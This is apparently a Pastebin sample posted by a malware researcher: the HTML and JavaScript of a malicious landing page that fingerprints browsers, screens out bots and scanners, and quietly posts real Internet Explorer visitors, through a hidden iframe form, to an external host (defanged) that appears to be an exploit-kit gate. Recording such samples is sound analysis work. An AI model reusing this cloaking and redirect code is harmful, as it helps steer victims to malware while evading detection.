Advertisement
MalwareBreakdown

Original landing page

Mar 7th, 2017
11,467
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.36 KB | None | 0 0
  1. <!DOCTYPE html>
  2. <html lang="en">
  3. <head>
  4. <title></title>
  5. <meta charset="UTF-8">
  6. <meta http-equiv="X-UA-Compatible" content="IE=EDGE">
  7. <meta name="apple-mobile-web-app-capable" content="yes">
  8. <meta name="apple-mobile-web-app-status-bar-style" content="black">
  9. <meta name="viewport" content="width=device-width, initial-scale=1.0">
  10. </head>
  11. <body>
  12. <iframe onload="window.setTimeout('start()', 88)" src="about:blank" style="visibility:hidden"></iframe>
  13. <script>
  14. var NormalURL = 'http://top[.]TROJAN[.]NEWS/?ct=Vivaldi&q=w3nQMvXcJxfQFYbGMv7DSKNbNkvWHViPxoaG9MildZiqZGX_k7TDfF-qoVvcCgWRxfso&tuif=3248&br_fl=2731&oq=LLJSOgvhiUeIcwJoz4cJBltC8aD6h0iAyESY0ZSB-hOKZg9CqaKWFLM_2V73_7dJMMgX&biw=Vivaldi.89ps104.406y7z4m6&yus=Vivaldi.85iu62.406y5s7i4';
  15. var InfoStr = '';
  16.  
  17. function getBrowser() {
  18. var ua = navigator.userAgent;
  19.  
  20. var browsrObj = {
  21. browser: 'unknown',
  22. browser_real: '',
  23. is_bot: false,
  24. browser_quality: 0,
  25. platform: 'desktop',
  26. versionFull: '',
  27. versionShort: ''
  28. };
  29.  
  30. try{
  31.  
  32. var bName = function () {
  33. if (ua.search(/Edge/) > -1) return "edge";
  34. if ((ua.search(/MSIE/) > -1) || (ua./**/search(/Trident/) > -1)) return "ie";
  35. if (ua.search(/Firefox/) > -1) return "firefox";
  36. if ((ua.search(/Opera/) > -1) || (ua.search(/OPR/) > -1)) return "opera";
  37. if (ua.search(/YaBrowser/) > -1) return "yabrowser";
  38. if (ua.search(/Chrome/) > -1) return "chrome";
  39. if (ua.search(/Safari/) > -1) return "safari";
  40. if (ua.search(/Maxthon/) > -1) return "maxthon";
  41. else return "unknown";
  42. }();
  43.  
  44. browsrObj.browser = bName;
  45.  
  46. if(/iphone|ipad|ipod|android|blackberry|mini|windows\sce|palm/i.test(navigator.userAgent.toLowerCase())) browsrObj.platform = 'mobile';
  47.  
  48.  
  49. var version;
  50. if(bName != 'unknown')
  51. {
  52. switch (bName) {
  53. case "edge":
  54. version = (ua.split("Edge")[1]).split("/")[1];
  55. break;
  56. case "ie":
  57. if((ua.search(/Trident/) > -1))
  58. {
  59. version = (ua.split("; rv:")[1]).split(")")[0];
  60. }
  61. else
  62. {
  63. version = (ua.split("MSIE ")[1]).split(";")[0];
  64. }
  65. break;
  66. case "firefox":
  67. version = ua.split("Firefox/")[1];
  68. break;
  69. case "opera":
  70. version = ua.split("Version/")[1];
  71. break;
  72. case "operaWebkit":
  73. bName = "opera";
  74. version = ua.split("OPR/")[1];
  75. break;
  76. case "yabrowser":
  77. version = (ua.split("YaBrowser/")[1]).split(" ")[0];
  78. break;
  79. case "chrome":
  80. version = (ua.split("Chrome/")[1]).split(" ")[0];
  81. break;
  82. case "safari":
  83. version = (ua.split("Version/")[1]).split(" ")[0];
  84. break;
  85. case "maxthon":
  86. version = ua.split("Maxthon/")[1];
  87. break;
  88.  
  89. }
  90.  
  91. browsrObj.versionFull = version;
  92. browsrObj.versionShort = version.split(".")[0];
  93. }
  94.  
  95. } catch (err) {}
  96.  
  97.  
  98. var w=window,d=document;
  99. var CorrectBrowser = true;
  100. var uaBrowser = browsrObj;
  101. var isIE = isChrome = isFirefox = isOpera = 0;
  102.  
  103. if(uaBrowser.platform != 'mobile' && (browsrObj.browser == 'ie' || browsrObj.browser == 'chrome' || browsrObj.browser == 'firefox')) {
  104. if('ActiveXObject' in window) isIE++;
  105. if('chrome' in window) isChrome++;
  106. if('opera' in window) isOpera++;
  107. if('getBoxObjectFor' in d || 'mozInnerScreenX' in w) isFirefox++;
  108. if('WebKitCSSMatrix' in w||'WebKitPoint' in w||'webkitStorageInfo' in w||'webkitURL' in w) isChrome++;
  109. var f=0;
  110. f|='sandbox' in d.createElement('iframe')?1:0;
  111. f|='WebSocket' in w?2:0;
  112. f|=w.Worker?4:0;
  113. f|=w.applicationCache?8:0;
  114. f|=w.history && history.pushState?16:0;
  115. f|=d.documentElement.webkitRequestFullScreen?32:0;
  116. f|='FileReader' in w?64:0;
  117.  
  118. if(f==0) isIE++;
  119.  
  120. if(isIE > 0) {
  121. browsrObj.browser_real = 'ie';
  122. browsrObj.browser_quality = isIE;
  123. }
  124. if(isChrome > 1 && isFirefox == 0) {
  125. browsrObj.browser_real = 'chrome';
  126. browsrObj.browser_quality = isChrome;
  127. }
  128. if(isFirefox > 0 && isChrome == 0) {
  129. browsrObj.browser_real = 'firefox';
  130. browsrObj.browser_quality = isFirefox;
  131. }
  132.  
  133. if(uaBrowser.browser != uaBrowser.browser_real) browsrObj.is_bot = true;
  134. }
  135.  
  136. InfoStr += browsrObj.browser+'-'+browsrObj.browser_real+'_ie'+isIE+'chrome'+isChrome+'firefox'+isFirefox;
  137.  
  138. return browsrObj;
  139. }
  140.  
  141. function start() {
  142. BrowserInfo = getBrowser();
  143.  
  144. if(BrowserInfo.is_bot == true) {
  145. document.write('');
  146. <?php //document.write('<iframe src="./botstrap/log_it.php?info='+InfoStr+'" width=10 height=10></iframe></body></html>'); ?>
  147. } else {
  148. if(BrowserInfo.browser_real=='ie') {
  149. window.frames[0].document.body.innerHTML = '<form target="_parent" method="post" action="'+NormalURL+'"></form>';
  150. window.frames[0].document.forms[0].submit();
  151. }
  152. }
  153.  
  154. }
  155.  
  156. </script>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement